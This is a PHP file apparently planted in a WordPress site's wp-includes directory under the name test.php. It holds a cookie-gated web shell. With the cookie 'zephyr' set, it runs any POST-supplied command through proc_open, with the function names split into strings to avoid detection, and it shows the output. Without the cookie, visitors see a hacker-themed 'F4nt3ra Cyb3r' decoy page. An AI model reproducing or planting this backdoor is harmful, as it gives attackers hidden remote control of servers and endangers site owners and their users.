/home/ivoiecob/risinghoopers.com/wp-includes/js/dist/development/test.php
<?php
$cookie_name = "zephyr";
$cookie_value = "zephyr";
if (isset ($_COOKIE[$cookie_name]) && $_COOKIE[$cookie_name] === $cookie_value) {
?>
<?php
error_reporting(0);
if (!empty($_POST['cmd'])) {
$a = "pro";
$b = "c_";
$c = "open";
$func = $a.$b.$c;
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w')
);
$process = $func($_POST['cmd'], $descriptorspec, $pipes);
if (is_resource($process)) {
fclose($pipes[0]);
$d = "stream_";
$e = "get";
$f = "_contents";
$data = $d.$e.$f;
$ppp = $data($pipes[1]);
$error_output = $data($pipes[2]);
fclose($pipes[1]);
fclose($pipes[2]);
$value1 = "pro";
$value2 = "c_c";
$value3 = "lose";
$valuate = $value1.$value2.$value3;
$return_value = $valuate($process);
}
}
echo "
<center>
<div class='mb-3'>
<form method='POST'>
<div class='input-group mb-3'>
<input class='form-control btn-sm' type='text' name='cmd' value='".htmlspecialchars($_POST['cmd'] ?? '', ENT_QUOTES, 'UTF-8')."' placeholder='ls -la'>
<button class='btn btn-outline-light btn-sm' type='submit'><i class='tombol'>Gass Entod</i></button>
</div>
</form>
</center>";
if (isset($ppp)) {
echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:15px;"><gr>~</gr>$ <rd>'.htmlspecialchars($_POST['cmd']).'</rd><br><code>'.htmlspecialchars($ppp, ENT_QUOTES, 'UTF-8').'</code></pre>
</div>
</div>';
} elseif ($_SERVER['REQUEST_METHOD'] == 'POST') {
echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:15px;"><code>'.htmlspecialchars($error_output, ENT_QUOTES, 'UTF-8').'</code></pre>
</div>
</div>';
}
?>
<?php
exit();
}
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>F4nt3ra Cyb3r</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Segoe UI', sans-serif;
background: #000000; /* solid black untuk nuansa hacker */
color: #00ff00; /* neon green */
}
/* Neon Text Animation */
@keyframes neon {
0%, 100% { text-shadow: 0 0 5px #00ff00, 0 0 10px #00ff00, 0 0 20px #00ff00, 0 0 40px #00ff00, 0 0 80px #0f0; }
50% { text-shadow: 0 0 10px #0f0, 0 0 20px #0f0, 0 0 30px #0f0, 0 0 50px #0f0, 0 0 100px #0f0; }
}
/* Navbar */
nav {
display: flex;
justify-content: space-between;
padding: 15px 30px;
background: rgba(0, 0, 0, 0.9);
border-bottom: 1px solid #00ff00;
}
nav h1 {
color: #00ff00;
letter-spacing: 2px;
font-weight: bold;
animation: neon 1.5s ease-in-out infinite alternate;
}
nav a {
color: #00ff00;
margin-left: 15px;
text-decoration: none;
transition: 0.3s;
}
nav a:hover {
color: #0ff; /* cyan */
text-shadow: 0 0 10px #0ff, 0 0 20px #0ff;
}
/* Hero */
.hero {
text-align: center;
padding: 100px 20px;
}
.hero h2 {
font-size: 50px;
margin-bottom: 10px;
font-weight: bold;
color: #0ff; /* cyan */
animation: neon 1.5s ease-in-out infinite alternate;
}
.hero p {
color: #7fff00; /* lime green */
margin-bottom: 20px;
}
/* Button */
button {
padding: 10px 20px;
border: 1px solid #0ff;
background: transparent;
color: #0ff;
border-radius: 8px;
cursor: pointer;
transition: 0.3s;
}
button:hover {
background: #0ff;
color: black;
box-shadow: 0 0 15px #0ff;
}
/* Card Section */
.container {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
gap: 20px;
padding: 40px;
}
.card {
background: rgba(0, 0, 0, 0.8);
padding: 20px;
border-radius: 15px;
border: 1px solid #00ff00;
transition: 0.3s;
}
.card:hover {
transform: translateY(-5px);
box-shadow: 0 0 20px #0ff, 0 0 40px #0ff;
}
.card h3 {
color: #00ff00; /* neon green */
}
.card p {
color: #7fff00; /* lime green */
}
/* Footer */
footer {
text-align: center;
padding: 20px;
color: #00ff00;
border-top: 1px solid #00ff00;
}
</style>
</head>
<body>
<nav>
<h1>HGM</h1>
<div>
<a href="#">Home</a>
<a href="#">Tools</a>
<a href="#">Contact</a>
</div>
</nav>
<section class="hero">
<h2>F4NT3RA CYB3R</h2>
<p>私のデジタル空間へようこそ</p>
<button onclick="alert('F4nt3ra Cyb3rへようこそ')">入る</button>
</section>
<section class="container">
<div class="card">
<h3>⚡ パフォーマンス</h3>
<p>高速で軽量なウェブインターフェース.</p>
</div>
<div class="card">
<h3>🛡️ セキュリティ</h3>
<p>安全でクリーンな構造で構築.</p>
</div>
<div class="card">
<h3>💻 開発</h3>
<p>カスタマイズや拡張の準備ができています</p>
</div>
</section>
<footer>
© 2026 - HGM
</footer>
</body>
</html>